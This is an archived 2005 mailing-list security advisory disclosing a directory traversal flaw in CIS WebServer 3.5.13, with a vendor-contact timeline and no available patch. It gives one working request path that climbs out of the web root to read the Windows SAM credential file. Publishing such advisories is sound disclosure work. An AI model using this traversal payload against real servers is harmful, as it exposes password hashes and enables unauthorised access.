Network Security: Detailed info on CIS WebServer Directory Traversal Bug

Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.

Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.

Network Security Vuln-Dev

[Top] [All Lists]

CIS WebServer Directory Traversal Bug

from [CorryL] Network Security

[Permanent Link]

Subject:	CIS WebServer Directory Traversal Bug
Date:	Fri, 25 Feb 2005 18:31:34 +0100

-=[ x0n3-h4ck Italian Security Team ]=-

/*Advisories*\

/*

Application: CIS WebServer

Vendor's Url: www.cisindia.net

Version: 3.5.13

Platforms: Windows

Bug: Directory Traversal

Exploitation: Remote

Author: CorryL

corryl80@gmail.com

www.x0n3-h4ck.org

*\



{Description}

CIS WebServer is an easy http server, A remote user can obtain files on the
system that are located outside of
the web document directory.


{Bug}

http://victimhost/../../../windows/repair/sam

A remote user succeds to read the file sam of the system where CIS WebServer
is running



{Vendor Status}

20/02/2005 Vendor notification

21/02/2005 Vendor Response

25/02/2005 No patch relase from vendor

25/02/2005 Public disclousure

{Fix}

Waiting for an official patch









_________________________________
www.seekstat.it is your web stat

[More with this subject...]

<Prev in Thread]	Current Thread	[Next in Thread>
CIS WebServer Directory Traversal Bug, CorryL <=

Previous by Date:	iDEFENSE Security Advisory 02.25.05: WU-FTPD File Globbing Denial of Service Vulnerability, iDEFENSE Labs
Next by Date:	[Full-Disclosure] [ GLSA 200502-30 ] cmd5checkpw: Local password leak vulnerability, Thierry Carrez
Previous by Thread:	iDEFENSE Security Advisory 02.25.05: WU-FTPD File Globbing Denial of Service Vulnerability, iDEFENSE Labs
Next by Thread:	[Full-Disclosure] [ GLSA 200502-30 ] cmd5checkpw: Local password leak vulnerability, Thierry Carrez
Indexes:	[Date] [Thread] [Top] [All Lists]